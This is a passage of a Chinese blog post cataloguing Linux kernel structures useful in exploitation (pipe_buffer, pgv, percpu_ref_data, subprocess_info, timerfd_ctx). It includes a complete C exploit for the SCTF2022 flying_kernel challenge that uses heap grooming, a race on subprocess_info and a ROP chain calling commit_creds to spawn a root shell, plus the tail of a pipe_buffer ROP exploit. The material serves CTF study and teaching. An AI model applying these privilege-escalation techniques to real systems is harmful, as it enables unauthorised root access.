    /* Step 5: build the replacement pipe_buffer image in buf: ops points
     * 0x100 bytes into the same object, where the forged table lives. */
    ((struct pipe_buffer *) buf)->ops = (void *) (pipe_buffer_addr + 0x100);
    ((struct pipe_buf_operations *) (((char *) buf) + 0x100))->release = (void *) push_rsi_pop_rsp_pop_rbx_pop_rbp_pop_r12_ret;

    int rop_idx = 0;
    size_t *rop = &buf[3];
    rop[rop_idx++] = pop_rdi_ret;
    rop[rop_idx++] = init_cred;
    rop[rop_idx++] = commit_creds;
    rop[rop_idx++] = swapgs_restore_regs_and_return_to_usermode + 0x31;
    rop[rop_idx++] = 0;
    rop[rop_idx++] = 0;
    rop[rop_idx++] = 114514;
    rop[rop_idx++] = user_cs;
    rop[rop_idx++] = user_rflags;
    rop[rop_idx++] = user_sp;
    rop[rop_idx++] = user_ss;
    signal(SIGSEGV, get_shell);

    /* Step 6: free the slot once more, write the image over it, then close the pipe. */
    delete(0);
    alloc(0, PIPE_BUFFER_SIZE, buf);

    close(pipe_fd[0]);
    close(pipe_fd[1]);

    return 0;
}

pgv 与页级内存页分配

内核网络协议栈中有很多值得深挖的结构体,其中 ring buffer 相关的 packet_ring_buffer 和 pgv 结构体可以帮我们完成页级的内存分配 & 释放。

packet_ring_buffer :PF_PACKET 模式下的 ring buffer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/* Ring buffer descriptor for PF_PACKET sockets; pg_vec points at the array of block descriptors. */
struct packet_ring_buffer {
struct pgv *pg_vec;

unsigned int head;
unsigned int frames_per_block;
unsigned int frame_size;
unsigned int frame_max;

unsigned int pg_vec_order;
unsigned int pg_vec_pages;
unsigned int pg_vec_len;

unsigned int __percpu *pending_refcnt;

union {
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};

pgv:页级内存分配

pgv 结构体的定义比较简单,其实就是一个指向一块内存的指针

1
2
3
/* One ring block: a single pointer to the block's memory (filled in by alloc_pg_vec()). */
struct pgv {
char *buffer;
};

在实际使用时实际上是先分配该结构体的数组,再分配对应的页级内存

分配(GFP_KERNEL) & 页级内存分配

当我们创建一个 protocol 为 PF_PACKET 的 socket 之后,其函数表为 packet_ops,接下来我们先调用 setsockopt() 将 PACKET_VERSION 设为 TPACKET_V1 / TPACKET_V2,再调用 setsockopt() 提交一个 PACKET_TX_RING ,此时便存在如下调用链:

1
2
3
4
5
__sys_setsockopt()
sock->ops->setsockopt() // packet_ops
packet_setsockopt() // case PACKET_TX_RING ↓
packet_set_ring()
alloc_pg_vec()

alloc_pg_vec() 中会创建一个 pgv 结构体数组,用以分配 tp_block_nr 份 $2^{\text{order}}$ 张内存页,其中 order 由 tp_block_size 决定:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Allocate an array of req->tp_block_nr pgv entries and one block of the
 * given page order for each entry. Returns the array, or NULL when the array
 * or any block cannot be allocated (blocks already obtained are released via
 * free_pg_vec()).
 */
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

/* the descriptor array itself: block_nr * sizeof(struct pgv) bytes */
pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}

alloc_one_pg_vec_page() 中会直接调用 __get_free_pages() 向 buddy system 请求内存页,因此我们可以利用该函数进行大量的页面请求:

1
2
3
4
5
6
7
8
9
10
11
/*
 * Excerpt of alloc_one_pg_vec_page(); the rest is elided with "//...".
 * First attempt shown here: request zeroed pages of the given order through
 * __get_free_pages() and return them when the request succeeds.
 */
static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;
//...
}

释放

相对地,pgv 中的页面会在 socket 被关闭后释放,由此我们便有了一个页级内存的分配/释放原语

使用限制

需要注意的是低权限用户无法创建一个类型为 SOCK_RAW 协议为 PF_PACKET 的 socket,但是我们可以通过开辟新的命名空间来绕过该限制,不过这样也有一定的缺陷:我们的进程也被隔离到该命名空间里了,无法获得“真正的 root 权限”

因此我们最好的做法便是开辟一个子进程,在该子进程中开辟新命名空间专门进行堆喷,父进程/其他子进程用于提权,通过管道与该子进程进行交互。

percpu_ref_data(kmalloc-64|GFP_KERNEL)

percpu_ref_data 包含两种有用的指针,其中 release 可以泄露内核基址(io_uring 已经整合到了内核中,io_ring_ctx_ref_free() 和 io_rsrc_node_ref_zero() 的地址可以用于计算内核基址),ref 可以泄露 physmap 基址。

1
2
3
4
5
6
7
8
9
/* Out-of-line state of a percpu_ref; allocated in percpu_ref_init(). */
struct percpu_ref_data {
atomic_long_t count;
percpu_ref_func_t *release; // function pointer: reveals the kernel base
percpu_ref_func_t *confirm_switch;// function pointer: reveals the kernel base
bool force_atomic:1;
bool allow_reinit:1;
struct rcu_head rcu;
struct percpu_ref *ref; // physmap address
};

该对象在 io_ring_ctx_alloc() -> percpu_ref_init() 函数中分配,用户可以使用 io_uring_setup 系统调用来触发执行该函数(在初始化 io_ring_ctx 对象时调用该函数),调用 close 可以释放该对象。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/*
 * Excerpt of percpu_ref_init(); "..." marks omitted code.
 * Allocates the percpu_ref_data with the caller's gfp flags, stores the
 * release callback and the back-pointer to ref in it, and attaches it to ref.
 */
int percpu_ref_init(struct percpu_ref *ref, percpu_ref_func_t *release,
unsigned int flags, gfp_t gfp)
{
struct percpu_ref_data *data;

...

data = kzalloc(sizeof(*ref->data), gfp); // alloc

...

data->release = release;
data->confirm_switch = NULL;
data->ref = ref;
ref->data = data;
return 0;
}

/*
 * Excerpt of io_ring_ctx_alloc(); "..." marks omitted code.
 * Shows the percpu_ref_init() call that sets up ctx->refs with
 * io_ring_ctx_ref_free as the release callback and GFP_KERNEL as the
 * allocation flags.
 */
static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
{
struct io_ring_ctx *ctx;

...

if (percpu_ref_init(&ctx->refs, io_ring_ctx_ref_free, // <-----------
PERCPU_REF_ALLOW_REINIT, GFP_KERNEL))
goto err;

...
}

subprocess_info 与套接字相关

subprocess_info:kmalloc-128

定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/* Work item embedded as the first member of subprocess_info; func is the handler pointer. */
struct work_struct {
atomic_long_t data;
struct list_head entry;
work_func_t func;
#ifdef CONFIG_LOCKDEP
struct lockdep_map lockdep_map;
#endif
};

/*
 * Descriptor of a user-mode helper invocation. It carries two function
 * pointers (init, cleanup) in addition to work.func.
 */
struct subprocess_info {
struct work_struct work;
struct completion *complete;
const char *path;
char **argv;
char **envp;
struct file *file;
int wait;
int retval;
pid_t pid;
int (*init)(struct subprocess_info *info, struct cred *new);
void (*cleanup)(struct subprocess_info *info);
void *data;
} __randomize_layout;

分配/释放

当我们尝试创建一个未知协议(socket(22, AF_INET, 0))时,便会创建一个 subprocess_info 结构体,对应地,在系统调用结束之后该结构体便会被立即释放,过程其实有点类似 setxattr,不同的是没有任何用户空间数据会被拷贝至内核空间。

因为该结构体在创建之后就会被释放掉,因此基于该结构体的利用都要用到条件竞争。

数据泄露(条件竞争)

  • 内核 .text 段地址

    该结构体的 work.func 可能指向 call_usermodehelper_exec_work,若是我们能利用条件竞争读出该指针便能泄露出内核的 .text 段的基址。

劫持内核执行流(条件竞争)

在释放该结构体时会调用其 cleanup 指针成员,若是我们能够在创建该结构体之后、释放该结构体之前劫持该指针便能控制内核执行流,但是这个竞争窗口比较小,因此实际上我们很难利用这种方式完成利用。
在这里插入图片描述

例题:SCTF2022 - flying_kernel

附件下载链接

存在 UAF 和 格式化字符串漏洞,object 属于 kmalloc-128

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
 * Decompiled ioctl handler of the challenge driver. Three commands operate on
 * the single global pointer sctf_buf: 0x5555 allocates, 0x6666 frees, 0x7777
 * prints. Unknown commands return -1.
 */
__int64 __fastcall seven_ioctl(__int64 a1, int a2, __int64 a3)
{
switch ( a2 )
{
case 0x6666:
if ( sctf_buf )
{
/* sctf_buf is not reset after the free, so later commands still see the old pointer */
kfree(sctf_buf);
return 0LL;
}
else
{
printk("What are you doing?");
return -1LL;
}
case 0x7777:
if ( sctf_buf )
/* the buffer contents are passed to printk() as the format string */
printk(sctf_buf);
return 0LL;
case 0x5555:
/* only a request argument of exactly 0x80 triggers an allocation */
if ( a3 == 0x80 )
{
sctf_buf = kmem_cache_alloc_trace(kmalloc_caches[7], 0xCC0LL);
printk("Add Success!\n");
}
else
{
printk("It's not that simple\n");
}
return 0LL;
default:
return -1LL;
}
}

由于题目中 qemu 的启动参数未配置 quiet ,可以看到内核的日志信息。因此我们可以通过格式化字符串漏洞泄露内核基址。

利用格式化字符串漏洞的输入为 %llx %llx %llx %llx %llx %llx %llx %llx %llx %llx %llx %llx ,注意这里不能使用%p,否则内核会检测到信息泄漏,得不到正确的结果。

不过我们也可以通过 user_key_payload + subprocess_info 泄露内核基址,由于创建 user_key_payload 时第一次申请的 user_key_payload 会被释放掉,因此需要借助 msg_msg 进行堆风水使得 user_key_payload 和 subprocess_info 使用同一个 object 。

之后竞争修改 subprocess_info 的 cleanup 指针劫持内核执行流。由于没有开 SMAP 保护,因此可以将栈迁移到用户空间的 ROP 上进行提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/keyctl.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/sysinfo.h>

/*
 * Return a pseudo-random integer in the half-open range [min, max).
 *
 * When the range is empty (max <= min) min is returned; the previous code
 * evaluated rand() % 0 for max == min, which is undefined behavior.
 */
int randint(int min, int max) {
    if (max <= min) {
        return min;
    }
    return min + (rand() % (max - min));
}

/*
 * Pin the caller to one CPU.
 *
 * fixed:  true selects CPU 0; false selects a random CPU other than 0.
 * thread: true applies the affinity to the calling thread, false to the
 *         whole process.
 *
 * On a single-CPU machine CPU 0 is used even when fixed is false, because
 * there is no other CPU to pick. Failures are reported on stderr and do not
 * stop the program.
 */
void bind_core(bool fixed, bool thread) {
    cpu_set_t mask;
    int ncpu = get_nprocs();
    int core = (fixed || ncpu < 2) ? 0 : randint(1, ncpu);

    CPU_ZERO(&mask);
    CPU_SET(core, &mask);
    if (thread) {
        /* pthread_* functions return the error number instead of setting errno */
        int err = pthread_setaffinity_np(pthread_self(), sizeof(mask), &mask);
        if (err != 0) {
            fprintf(stderr, "[-] pthread_setaffinity_np: %s\n", strerror(err));
        }
    } else if (sched_setaffinity(getpid(), sizeof(mask), &mask) != 0) {
        perror("[-] sched_setaffinity");
    }
}

size_t user_cs, user_rflags, user_sp, user_ss;

/*
 * Record the current user-mode cs, ss, rsp and rflags in the user_* globals.
 * main() later places these values at the end of its ROP chain.
 * NOTE(review): the operand order (destination first) looks like Intel
 * syntax, so this presumably needs -masm=intel -- confirm the build flags.
 */
void save_status() {
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("[*] status has been saved.");
}

/*
 * Hex-dump a buffer as rows of four 64-bit words followed by an ASCII column.
 *
 * desc: optional title printed before the dump (NULL to omit).
 * addr: start of the buffer.
 * len:  buffer length in bytes; only whole 8-byte words are printed in the
 *       hex columns.
 *
 * Missing words on the last row are padded to the full column width so the
 * ASCII column stays aligned.
 */
void qword_dump(char *desc, void *addr, int len) {
    const uint64_t *qwords = (const uint64_t *) addr;
    const uint8_t *bytes = (const uint8_t *) addr;
    const int nqwords = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int row = 0; row < nqwords; row += 4) {
        printf(" %04x", row * 8);
        for (int col = 0; col < 4; col++) {
            if (row + col < nqwords) {
                /* cast so the conversion matches on every ABI, not only where uint64_t is unsigned long */
                printf(" 0x%016llx", (unsigned long long) qwords[row + col]);
            } else {
                /* same width as one " 0x%016llx" column */
                printf("%19s", "");
            }
        }
        printf(" ");
        for (int off = 0; off < 32 && off + row * 8 < len; off++) {
            uint8_t ch = bytes[row * 8 + off];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/* Doubly linked list node; userland copy used as the first member of msg_msg below. */
struct list_head {
struct list_head *next, *prev;
};

/* one msg_msg structure for each message */
/* Userland copy of the message header; used for sizeof() arithmetic and by build_msg(). */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
void *next; /* struct msg_msgseg *next; */
void *security; /* NULL without SELinux */
/* the actual message follows immediately */
};

/* Header of a message continuation segment; only its size is used here (DATALEN_SEG). */
struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

#define PAGE_SIZE 0x1000
#define DATALEN_MSG ((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))

/* Create a new private System V message queue with mode 0666 and return msgget()'s result. */
int get_msg_queue(void) {
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

/* Receive (and remove) a message of type msgtyp from the queue with flags 0; returns msgrcv()'s result. */
long read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/*
 * Send msgp to the queue as a message of type msgtyp. The type is written
 * into the buffer's leading mtype field first, so msgp must start with one.
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
((struct msgbuf *) msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* Call msgrcv() with MSG_COPY | IPC_NOWAIT | MSG_NOERROR, i.e. a non-blocking copy-style receive. */
long peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

/*
 * Fill in every field of the msg_msg header located at msg from raw 64-bit
 * values; pointer fields receive the values reinterpreted as addresses.
 */
void build_msg(void *msg, uint64_t m_list_next, uint64_t m_list_prev,
               uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security) {
    struct msg_msg *hdr = msg;

    hdr->m_list.next = (void *) m_list_next;
    hdr->m_list.prev = (void *) m_list_prev;
    hdr->m_type = (long) m_type;
    hdr->m_ts = m_ts;
    hdr->next = (void *) next;
    hdr->security = (void *) security;
}

/* Userland copy of the callback head embedded in user_key_payload (aliased to rcu_head below). */
struct callback_head {
struct callback_head *next;

void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));

#define rcu_head callback_head
#define __aligned(x) __attribute__((__aligned__(x)))
typedef unsigned long long u64;

/* Userland copy of the payload header used by "user" keys; key_alloc() subtracts its size from the object size. */
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[0] __aligned(__alignof__(u64)); /* actual data */
};

#define KEY_NUM 199
int key_id[KEY_NUM];

int key_alloc(int id, void *payload, int payload_len) {
char description[0x10] = {};
sprintf(description, "%d", id);
return key_id[id] = syscall(__NR_add_key, "user", description, payload, payload_len - sizeof(struct user_key_payload), KEY_SPEC_PROCESS_KEYRING);
}

/* keyctl(KEYCTL_UPDATE) on the key stored in key_id[id]; id is not range-checked. */
int key_update(int id, void *payload, size_t plen) {
return syscall(__NR_keyctl, KEYCTL_UPDATE, key_id[id], payload, plen);
}

/* keyctl(KEYCTL_READ) on the key stored in key_id[id] into bufer (capacity buflen); id is not range-checked. */
int key_read(int id, void *bufer, size_t buflen) {
return syscall(__NR_keyctl, KEYCTL_READ, key_id[id], bufer, buflen);
}

/* keyctl(KEYCTL_REVOKE) on the key stored in key_id[id]; id is not range-checked. */
int key_revoke(int id) {
return syscall(__NR_keyctl, KEYCTL_REVOKE, key_id[id], 0, 0, 0);
}

/* keyctl(KEYCTL_UNLINK): unlink the key stored in key_id[id] from the process keyring; id is not range-checked. */
int key_unlink(int id) {
return syscall(__NR_keyctl, KEYCTL_UNLINK, key_id[id], KEY_SPEC_PROCESS_KEYRING);
}

#define OBJ_SIZE 0x80
int seven_fd;

/* Send ioctl 0x5555 with argument 0x80 to the driver; the result is not checked. */
void object_alloc() {
ioctl(seven_fd, 0x5555, 0x80);
}

/* Send ioctl 0x6666 to the driver; the result is not checked. */
void object_delete() {
ioctl(seven_fd, 0x6666, 0);
}

/* Send ioctl 0x7777 to the driver; the result is not checked. */
void object_show() {
ioctl(seven_fd, 0x7777, 0);
}

/* Message buffer whose text length is OBJ_SIZE minus the msg_msg header size. */
struct {
long mtype;
char mtext[OBJ_SIZE - sizeof(struct msg_msg)];
} msgbuf;

/* Addresses for one specific kernel image; main() adds kernel_offset to each before use. */
size_t commit_creds = 0xffffffff8108c360;
size_t pop_rdi_ret = 0xffffffff811884e7;
size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF81C00DF0;
size_t prepare_kernel_cred = 0xffffffff8108c780;
size_t mov_rdi_rax_rep_ret = 0xffffffff81aed04b;
size_t pop_rcx_ret = 0xffffffff8101ed83;
size_t xchg_esp_eax_ret = 0xffffffff81011cb0;

bool success = false;

/*
 * Set the success flag (which stops the polling loops) and replace the
 * process with an interactive /bin/sh. main() installs this as the SIGSEGV
 * handler and also uses its address as the return target of the ROP chain.
 */
void get_shell(void) {
success = true;
char *args[] = {"/bin/sh", "-i", NULL};
execve(args[0], args, NULL);
}

/*
 * Thread body: repeatedly write a 0x20-byte buffer, whose first 8 bytes hold
 * xchg_esp_eax_ret, to the driver until the success flag is set.
 *
 * arg: unused; present so the signature matches a pthread start routine.
 *
 * Always returns NULL (the previous version fell off the end of a non-void
 * function).
 */
void *edit_subprocess_info(void *arg) {
    (void) arg;

    char *buf = malloc(0x20);
    if (buf == NULL) {
        perror("[-] malloc");
        return NULL;
    }
    /* NOTE(review): only the first 8 bytes are initialized; the remaining
     * 0x18 bytes are written as malloc returned them -- confirm that this is
     * intended. */
    *(size_t *) buf = xchg_esp_eax_ret;
    while (!success) {
        write(seven_fd, buf, 0x20);
    }
    free(buf);
    return NULL;
}

/*
 * Walkthrough program for the SCTF2022 flying_kernel challenge driver
 * (/dev/seven). The steps follow the write-up: overlap a user key with a
 * subprocess_info object to read a kernel pointer, then race a writer thread
 * against socket() calls.
 *
 * Both mmap() calls are now checked. The second one passes its address only
 * as a hint, so the returned mapping is verified to cover the chain. The
 * offset is printed with a matching conversion and label (it was "%p" with a
 * size_t argument and labelled "kernel base").
 */
int main() {
    bind_core(true, false);
    signal(SIGSEGV, (void *) get_shell);
    save_status();

    seven_fd = open("/dev/seven", O_RDWR);
    if (seven_fd < 0) {
        perror("[-] failed to open seven.");
        exit(-1);
    }
    char *buf = (char *) mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) {
        perror("[-] mmap");
        exit(-1);
    }
    /* Step 1: message, driver object and key are created and released in the
     * order given in the write-up, then socket() creates the subprocess_info. */
    int msqid = get_msg_queue();
    write_msg(msqid, &msgbuf, sizeof(msgbuf.mtext), 1);
    object_alloc();
    object_delete();
    read_msg(msqid, &msgbuf, sizeof msgbuf.mtext, 1);
    key_alloc(0, buf, 0x80);
    object_delete();
    socket(22, AF_INET, 0);
    printf("[*] key read len: %d\n", key_read(0, buf, -1));
    qword_dump("leak kernel addr from subprocess_info", buf, 0x100);
    size_t kernel_offset = *(size_t *) buf - 0xffffffff8107e910;
    printf("[+] kernel offset: %#zx\n", kernel_offset);

    commit_creds += kernel_offset;
    pop_rdi_ret += kernel_offset;
    swapgs_restore_regs_and_return_to_usermode += kernel_offset;
    prepare_kernel_cred += kernel_offset;
    mov_rdi_rax_rep_ret += kernel_offset;
    pop_rcx_ret += kernel_offset;
    xchg_esp_eax_ret += kernel_offset;

    /* Step 2: the chain lives at the low 32 bits of the gadget address. */
    size_t *rop = (void *) (xchg_esp_eax_ret & 0xFFFFFFFF);
    enum { ROP_QWORDS = 15, STACK_BYTES = 0x6000 };
    char *stack = mmap((char *) rop - 0x3000, STACK_BYTES, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (stack == MAP_FAILED) {
        perror("[-] mmap");
        exit(-1);
    }
    /* the address is only a hint: make sure the mapping really covers the chain */
    if ((uintptr_t) rop < (uintptr_t) stack ||
        (uintptr_t) (rop + ROP_QWORDS) > (uintptr_t) stack + STACK_BYTES) {
        fputs("[-] mapping does not cover the requested address\n", stderr);
        exit(-1);
    }
    *rop++ = pop_rdi_ret;
    *rop++ = 0;
    *rop++ = prepare_kernel_cred;
    *rop++ = pop_rcx_ret;
    *rop++ = 0;
    *rop++ = mov_rdi_rax_rep_ret;
    *rop++ = commit_creds;
    *rop++ = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop++;
    rop++;
    *rop++ = (size_t) get_shell;
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss;
    /* Step 3: writer thread versus repeated socket() calls until get_shell() sets success. */
    pthread_t t;
    pthread_create(&t, NULL, edit_subprocess_info, NULL);
    while (!success) {
        usleep(1);
        socket(22, AF_INET, 0);
    }

    return 0;
}

timerfd_ctx 与 timerfd 系列系统调用

自 2.6.25 版本起 Linux 提供了一种可以用以创建定时器的系统调用——timerfd 系列系统调用,相比起定时器的功能,我们更加关注系统调用过程中涉及到的 timerfd_ctx 结构体

timerfd_ctx(kmalloc-256 | GFP_KERNEL)

该结构体定义于 fs/timerfd.c 中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* Per-timerfd context; allocated in timerfd_create and released through kfree_rcu() in timerfd_release(). */
struct timerfd_ctx {
/* the timer itself: either a plain hrtimer or an alarm */
union {
struct hrtimer tmr;
struct alarm alarm;
} t;
ktime_t tintv;
ktime_t moffs;
wait_queue_head_t wqh;
u64 ticks;
int clockid;
short unsigned expired;
short unsigned settime_flags; /* to show in fdinfo */
struct rcu_head rcu;
struct list_head clist;
spinlock_t cancel_lock;
bool might_cancel;
};

其中的 hrtimer 结构体定义于 /include/linux/hrtimer.h 中,如下:

1
2
3
4
5
6
7
8
9
10
/* High-resolution timer; carries a callback pointer (function) and a pointer to its clock base (base). */
struct hrtimer {
struct timerqueue_node node;
ktime_t _softexpires;
enum hrtimer_restart (*function)(struct hrtimer *);
struct hrtimer_clock_base *base;
u8 state;
u8 is_rel;
u8 is_soft;
u8 is_hard;
};

分配/释放

我们可以通过 timerfd_create 系统调用来分配一个 timerfd_ctx 结构体,在 fs/timerfd.c 中有如下定义:

1
2
3
4
5
6
7
8
9
10
11
/*
 * Excerpt of the timerfd_create system call; omitted parts are marked "//...".
 * Shows the zeroed GFP_KERNEL allocation of the timerfd_ctx.
 */
SYSCALL_DEFINE2(timerfd_create, int, clockid, int, flags)
{
int ufd;
struct timerfd_ctx *ctx;

//...

ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);

//...
}

同样地,对于 timerfd 文件在 fs/timerfd.c 中定义了其函数表 timerfd_fops,如下:

1
2
3
4
5
6
7
8
/* File operations of a timerfd file; release is handled by timerfd_release. */
static const struct file_operations timerfd_fops = {
.release = timerfd_release,
.poll = timerfd_poll,
.read = timerfd_read,
.llseek = noop_llseek,
.show_fdinfo = timerfd_show,
.unlocked_ioctl = timerfd_ioctl,
};

其中 timerfd_release 定义于 fs/timerfd.c 中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
 * Release hook of a timerfd file: cancel the timer (alarm or hrtimer,
 * depending on isalarm()) and free the context through kfree_rcu().
 * Always returns 0.
 */
static int timerfd_release(struct inode *inode, struct file *file)
{
struct timerfd_ctx *ctx = file->private_data;

timerfd_remove_cancel(ctx);

if (isalarm(ctx))
alarm_cancel(&ctx->t.alarm);
else
hrtimer_cancel(&ctx->t.tmr);
/* the context is freed through its embedded rcu member rather than immediately */
kfree_rcu(ctx, rcu);
return 0;
}

即我们可以通过关闭 timerfd 文件来释放 timerfd_ctx 结构体。

数据泄露

  • 内核 .text 段地址

    timerfd_ctx 的 tmr 字段的 function 字段指向内核代码段,若能泄漏出该指针则我们便毫无疑问能泄漏出内核基址。

  • 内核线性映射区( direct mapping area)

    timerfd_ctx 的 tmr 字段的 base 字段指向内核“堆”上,若能泄露该字段我们同样能泄漏出内核的“堆上地址”。

  • Title: linux kernel pwn 常用结构体
  • Author: sky123
  • Created at : 2024-11-08 20:33:04
  • Updated at : 2024-11-20 03:33:25
  • Link: https://skyi23.github.io/2024/11/08/linux-kernel-pwn-useful-structs/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
linux kernel pwn 常用结构体